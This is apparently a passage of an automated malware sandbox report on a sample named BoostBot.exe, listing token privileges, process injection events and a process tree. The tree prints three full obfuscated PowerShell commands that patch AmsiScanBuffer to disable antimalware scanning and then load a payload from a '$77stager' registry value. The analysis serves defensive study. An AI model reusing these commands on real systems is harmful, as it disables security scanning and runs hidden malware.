SeSystemEnvironmentPrivilege 1420 svchost.exe Token: SeUndockPrivilege 1420 svchost.exe Token: SeManageVolumePrivilege 1420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1420 svchost.exe Token: SeIncreaseQuotaPrivilege 1420 svchost.exe Token: SeSecurityPrivilege 1420 svchost.exe Token: SeTakeOwnershipPrivilege 1420 svchost.exe Token: SeLoadDriverPrivilege 1420 svchost.exe Token: SeSystemtimePrivilege 1420 svchost.exe Token: SeBackupPrivilege 1420 svchost.exe Token: SeRestorePrivilege 1420 svchost.exe Token: SeShutdownPrivilege 1420 svchost.exe Token: SeSystemEnvironmentPrivilege 1420 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 1340 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEpid process 4024 RuntimeBroker.exe 3548 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exesvchost.exelsass.exedescription pid process target process PID 2824 wrote to memory of 3856 2824 cmd.exe certutil.exe PID 2824 wrote to memory of 3856 2824 cmd.exe certutil.exe PID 2824 wrote to memory of 2124 2824 cmd.exe powershell.exe PID 2824 wrote to memory of 2124 2824 cmd.exe powershell.exe PID 2124 wrote to memory of 4728 2124 powershell.exe BoostBot.exe PID 2124 wrote to memory of 4728 2124 powershell.exe BoostBot.exe PID 2124 wrote to memory of 4728 2124 powershell.exe BoostBot.exe PID 2824 wrote to memory of 2888 2824 cmd.exe icacls.exe PID 2824 wrote to memory of 2888 2824 cmd.exe icacls.exe PID 2824 wrote to memory of 1996 2824 cmd.exe reg.exe PID 2824 wrote to memory of 1996 2824 cmd.exe reg.exe PID 2824 wrote to memory of 2636 2824 cmd.exe attrib.exe PID 2824 wrote to memory of 2636 2824 cmd.exe attrib.exe PID 4728 wrote to memory of 2712 4728 BoostBot.exe schtasks.exe PID 4728 wrote to memory of 2712 4728 BoostBot.exe schtasks.exe PID 4728 wrote to memory of 2712 4728 BoostBot.exe schtasks.exe PID 4728 wrote to memory of 1340 4728 BoostBot.exe $sxr-powershell.exe PID 4728 wrote to memory of 1340 4728 BoostBot.exe $sxr-powershell.exe PID 4728 wrote to memory of 1340 4728 BoostBot.exe $sxr-powershell.exe PID 4728 wrote to memory of 4944 4728 BoostBot.exe install.exe PID 4728 wrote to memory of 4944 4728 BoostBot.exe install.exe PID 4728 wrote to memory of 4944 4728 BoostBot.exe install.exe PID 4728 wrote to memory of 4792 4728 BoostBot.exe SCHTASKS.exe PID 4728 wrote to memory of 4792 4728 BoostBot.exe SCHTASKS.exe PID 4728 wrote to memory of 4792 4728 BoostBot.exe SCHTASKS.exe PID 1340 wrote to memory of 1660 1340 $sxr-powershell.exe schtasks.exe PID 1340 wrote to memory of 1660 1340 $sxr-powershell.exe schtasks.exe PID 1340 wrote to memory of 1660 1340 $sxr-powershell.exe schtasks.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 3916 wrote to memory of 3440 3916 powershell.EXE dllhost.exe PID 1340 wrote to memory of 100 1340 $sxr-powershell.exe install.exe PID 1340 wrote to memory of 100 1340 $sxr-powershell.exe install.exe PID 1340 wrote to memory of 100 1340 $sxr-powershell.exe install.exe PID 3440 wrote to memory of 616 3440 dllhost.exe winlogon.exe PID 3440 wrote to memory of 672 3440 dllhost.exe lsass.exe PID 3440 wrote to memory of 948 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 380 3440 dllhost.exe dwm.exe PID 3440 wrote to memory of 412 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 944 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1084 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1152 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1160 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1212 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1236 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1292 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1312 3440 dllhost.exe svchost.exe PID 1152 wrote to memory of 3752 1152 svchost.exe powershell.EXE PID 1152 wrote to memory of 3752 1152 svchost.exe powershell.EXE PID 3440 wrote to memory of 3752 3440 dllhost.exe powershell.EXE PID 672 wrote to memory of 2828 672 lsass.exe sysmon.exe PID 3440 wrote to memory of 1428 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1436 3440 dllhost.exe svchost.exe PID 672 wrote to memory of 2828 672 lsass.exe sysmon.exe PID 3440 wrote to memory of 1552 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1564 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1676 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1688 3440 dllhost.exe svchost.exe PID 3440 wrote to memory of 1748 3440 dllhost.exe svchost.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c39a1af8-5042-45c2-9d5f-27a5f91baa40}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a516ef98-b82a-4acb-a589-77cdab0370b5}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3532 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{81ad7522-1687-454e-91bf-f3ca515a6eb6}2⤵PID:1408
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nEHjJCPcYqbL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ueYgXAkpbkCEZj,[Parameter(Position=1)][Type]$YvlgQibBnm)$GcGMWSPtkiY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'le'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+'l'+'eg'+'a'+''+'t'+''+[Char](101)+'Ty'+[Char](112)+''+'e'+'','C'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+'led,'+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s'+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$GcGMWSPtkiY.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+'i'+''+'a'+'l'+'N'+'ame'+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$ueYgXAkpbkCEZj).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'ti'+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$GcGMWSPtkiY.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+''+'l'+'',$YvlgQibBnm,$ueYgXAkpbkCEZj).SetImplementationFlags('R'+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $GcGMWSPtkiY.CreateType();}$QtoYilOSYasuy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+'.'+'W'+'in'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'afe'+'N'+''+'a'+'ti'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$lHyegANJRXwTdB=$QtoYilOSYasuy.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'dd'+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+','+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HWGxTYKccbwHKondnnE=nEHjJCPcYqbL @([String])([IntPtr]);$wxiDqJyCIrtijjNTuFNlyB=nEHjJCPcYqbL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wTZukGEJzue=$QtoYilOSYasuy.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+'l'+'32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$znsWQsuLVBPjXH=$lHyegANJRXwTdB.Invoke($Null,@([Object]$wTZukGEJzue,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+'A')));$VgXgeYlQTcAWIcxBt=$lHyegANJRXwTdB.Invoke($Null,@([Object]$wTZukGEJzue,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+'t'+'e'+'c'+''+[Char](116)+'')));$CWJdmjm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($znsWQsuLVBPjXH,$HWGxTYKccbwHKondnnE).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$ZtXpRKxoLVqCAJyrC=$lHyegANJRXwTdB.Invoke($Null,@([Object]$CWJdmjm,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+''+'n'+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$udIuFcohOS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VgXgeYlQTcAWIcxBt,$wxiDqJyCIrtijjNTuFNlyB).Invoke($ZtXpRKxoLVqCAJyrC,[uint32]8,4,[ref]$udIuFcohOS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZtXpRKxoLVqCAJyrC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VgXgeYlQTcAWIcxBt,$wxiDqJyCIrtijjNTuFNlyB).Invoke($ZtXpRKxoLVqCAJyrC,[uint32]8,0x20,[ref]$udIuFcohOS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uGCGZtEEHhju{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bCebNJvnNHpPYh,[Parameter(Position=1)][Type]$KDEAZtjexV)$wNEzcHkhIwk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'elega'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+'e','C'+'l'+''+'a'+''+[Char](115)+'s,P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$wNEzcHkhIwk.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+'me,'+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+'g'+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$bCebNJvnNHpPYh).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'na'+'g'+'ed');$wNEzcHkhIwk.DefineMethod('I'+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+','+[Char](86)+'i'+'r'+'tu'+'a'+''+[Char](108)+'',$KDEAZtjexV,$bCebNJvnNHpPYh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wNEzcHkhIwk.CreateType();}$vsCocoVMkngAy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'c'+'r'+''+'o'+'s'+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+'32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$eInuhhhBOjpWRO=$vsCocoVMkngAy.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+'d'+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jOLgGTgkLRyLeKZjpZq=uGCGZtEEHhju @([String])([IntPtr]);$TxPqZwzcTpcMSnEOPHTWbb=uGCGZtEEHhju @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jqEetLQWUjX=$vsCocoVMkngAy.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'H'+[Char](97)+'n'+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$tovMwcFqYZpBgm=$eInuhhhBOjpWRO.Invoke($Null,@([Object]$jqEetLQWUjX,[Object]('Lo'+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$wsjGdlwNTjjICQSvB=$eInuhhhBOjpWRO.Invoke($Null,@([Object]$jqEetLQWUjX,[Object]('Vi'+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$DwnEQvK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tovMwcFqYZpBgm,$jOLgGTgkLRyLeKZjpZq).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+'.'+'dl'+'l'+'');$UnoEPwAhgUVeIsAEz=$eInuhhhBOjpWRO.Invoke($Null,@([Object]$DwnEQvK,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$mEmMIjEHwO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wsjGdlwNTjjICQSvB,$TxPqZwzcTpcMSnEOPHTWbb).Invoke($UnoEPwAhgUVeIsAEz,[uint32]8,4,[ref]$mEmMIjEHwO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UnoEPwAhgUVeIsAEz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wsjGdlwNTjjICQSvB,$TxPqZwzcTpcMSnEOPHTWbb).Invoke($UnoEPwAhgUVeIsAEz,[uint32]8,0x20,[ref]$mEmMIjEHwO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3752 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NDwSoEYHQQHU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gyTnnHveqdUpYm,[Parameter(Position=1)][Type]$DHnXURGZtN)$jCDJEUrdPib=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'odu'+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+'e'+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+'A'+''+[Char](110)+'si'+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$jCDJEUrdPib.DefineConstructor('RT'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'me'+[Char](44)+''+'H'+'ide'+'B'+'y'+[Char](83)+'ig,'+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$gyTnnHveqdUpYm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+'e'+[Char](100)+'');$jCDJEUrdPib.DefineMethod('I'+'n'+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+'de'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'ua'+'l'+'',$DHnXURGZtN,$gyTnnHveqdUpYm).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'m'+'e'+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $jCDJEUrdPib.CreateType();}$GIpNAThDQmoJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+'eNa'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$UoJtGIDpigSVbc=$GIpNAThDQmoJv.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+'d'+[Char](114)+''+'e'+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'ic'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zIOMKmJqxEbrpZevPuU=NDwSoEYHQQHU @([String])([IntPtr]);$bpNYyywykInfAaSOTXSgBY=NDwSoEYHQQHU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$awvQFGKMhcP=$GIpNAThDQmoJv.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$XimHogbNfTEPJM=$UoJtGIDpigSVbc.Invoke($Null,@([Object]$awvQFGKMhcP,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'r'+[Char](97)+''+'r'+'yA')));$MmoWDeTffHkKlQouD=$UoJtGIDpigSVbc.Invoke($Null,@([Object]$awvQFGKMhcP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$umsZsQN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XimHogbNfTEPJM,$zIOMKmJqxEbrpZevPuU).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$TpQidhrqnLJesifnZ=$UoJtGIDpigSVbc.Invoke($Null,@([Object]$umsZsQN,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$NghvhoOgeE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MmoWDeTffHkKlQouD,$bpNYyywykInfAaSOTXSgBY).Invoke($TpQidhrqnLJesifnZ,[uint32]8,4,[ref]$NghvhoOgeE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TpQidhrqnLJesifnZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MmoWDeTffHkKlQouD,$bpNYyywykInfAaSOTXSgBY).Invoke($TpQidhrqnLJesifnZ,[uint32]8,0x20,[ref]$NghvhoOgeE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7s'+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
